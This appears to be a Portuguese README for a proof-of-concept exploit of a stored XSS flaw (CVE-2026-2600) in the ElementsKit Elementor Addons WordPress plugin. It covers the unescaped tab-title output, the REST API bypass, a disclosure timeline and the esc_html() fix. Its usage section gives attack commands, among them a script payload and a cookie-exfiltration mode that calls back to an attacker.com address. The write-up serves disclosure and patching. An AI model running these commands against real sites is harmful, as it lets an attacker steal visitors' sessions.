
Prova de conceito de exploit para CVE-2026-2600, um XSS armazenado em ElementsKit Elementor Addons <= 3.7.9, permitindo que Contribuidores autenticados injetem scripts arbitrários por meio de dados Elementor manipulados.
| CVSS | 6.4 MÉDIO |
| Afetado | <= 3.7.9 |
| Corrigido | 3.8.0 |
| Função mínima | Contributor (edit_posts) |
| Vetor | Rede / Baixa complexidade / Baixos privilégios |
O widget Simple Tab renderiza os títulos das abas com HTML via echo, mas sem escape na saída. Em widgets/tab/tab.php, o loop de renderização faz:
foreach ( $settings['ekit_tab_items'] as $index => $item ) {
echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
}
O editor do Elementor sanitiza a entrada no lado do cliente, mas o endpoint da API REST (/wp-json/wp/v2/posts/{id}) aceita o campo de metadados _elementor_data diretamente e ignora essa camada por completo.
Um Contributor autenticado pode fazer PATCH em um post com um payload JSON do Elementor manipulado que define ekit_tab_title como HTML arbitrário. Como o valor é armazenado literalmente em _elementor_data e exibido via echo sem esc_html() no momento da renderização, o script é executado no navegador de todos os visitantes quando a página carrega.
Qualquer Contributor pode:
Mais de 400 mil instalações ativas foram afetadas no momento da divulgação.
pip install requests
python3 poc.py https://target.com contributor p4ss
O script autentica via HTTP, obtém o nonce REST do editor administrativo, cria um post de rascunho, aplica PATCH em _elementor_data com o payload XSS embutido no campo ekit_tab_title e publica o post. A saída confirma se o payload está ativo no código-fonte da página.
# Payload personalizado
python3 poc.py https://target.com contributor p4ss --payload '<script>alert(document.domain)</script>'
# Exfiltração de cookies com callback
python3 poc.py https://target.com contributor p4ss --type cookie --callback https://attacker.com/steal
# Modo de console interativo
python3 console_poc.py
| Data | Evento |
|---|---|
| Janeiro de 2026 | Descoberto por meio de revisão de diff no SVN. PoC confirmado. |
| Janeiro de 2026 | Reportado à Patchstack Alliance com artigo completo e PoC. |
| Março de 2026 | Wpmet lançou a correção na v3.8.0. |
| Abril de 2026 | CVE-2026-2600 publicado. CVSS 6.4 MÉDIO atribuído. |
A Wpmet adicionou esc_html() ao redor da saída do título da aba em widgets/tab/tab.php:
- echo '<a ...>' . $item['ekit_tab_title'] . '</a>';
+ echo '<a ...>' . esc_html( $item['ekit_tab_title'] ) . '</a>';